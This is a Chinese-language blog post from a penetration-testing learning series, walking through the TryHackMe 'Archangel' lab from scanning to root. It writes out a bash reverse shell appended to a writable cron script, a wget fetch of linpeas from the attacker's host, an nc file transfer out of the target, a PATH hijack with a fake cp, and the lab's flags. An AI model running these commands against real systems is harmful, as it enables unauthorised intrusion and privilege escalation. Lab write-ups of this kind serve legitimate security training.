iT邦幫忙

2021 iThome 鐵人賽

DAY 19
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 19

[Day19] THM Archangel

Recon

  • 起手式,掃 Port rustscan -a 10.10.163.60

    • 80 , 22
  • 掃路徑 python3 dirsearch.py -u http://10.10.163.60/ -e all

  • 觀察網頁首頁,發現裡面有 /flag

Dfferent Hostname

  • 題目提示 : Find a different hostname

    • 可以觀察 mafialive.thm
  • sudo vim /etc/hosts

  • 再掃一次路徑python3 dirsearch.py -u http://mafialive.thm/ -e all

LFI

Shell

  • 使用 python 讓 terminal 變漂亮
    • python3 -c 'import pty; pty.spawn("/bin/bash")'
  • 找 user flag
    • thm{lf1_t0_rc3_1s_tr1cky}
  • 找到使用者資料夾內有 passwordbackup
    • ㄍ......再一次
    • 等......等等,不會吧
    • 該不會那個網址真 TM 是他的密碼 ?__?
      • 好的,好險不是

提權

  • 使用 Linpeas 掃
    • wget 10.13.21.55:8000/linpeas.sh
    • bash linpeas.sh
      • 找到一個可疑的 cron job
      • 發現 這個 cron 會使用 archangel 來執行,而且我們對 /opt/helloworld.sh有讀寫權限
      • 寫入 reverse shell
      • echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh
  • 等待一分鐘後,自動接上!!
    • 找到 flag
      • thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}
  • 觀察使用者中的 secret 資料夾中
    • 有一個 backup 檔案有 suid
  • 透過 nc 把檔案傳出來
    • 監聽端 nc -l -p 1234 > meow
    • 發送端 nc 10.13.21.55 1234 < backup
  • 哼!這種等級的 reverse,連 ida 都不用開,我們用 r2 就好ㄌ
    • r2 meow
    • aaa
    • s main
    • VV
    • 可以看到他會用 system call 一個 cp
    • 而 cp 沒有寫絕對路徑,所以可以用 path 進行誤導

PATH 欺騙

  • 在家目錄創一個 fakepath
    • mkdir fakepath
    • export PATH=/home/archangel/fakepath:$PATH
  • 準備一個假的 cp 檔案
    • echo '#!/bin/bash' > cp
    • echo "/bin/bash" >> cp
    • chmod +x cp
  • 執行 backup
    • ./backup
  • 取得 root 權限 !!
      • thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}

上一篇
[Day18] THM AgentSudo
下一篇
[Day20] THM DogCat
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言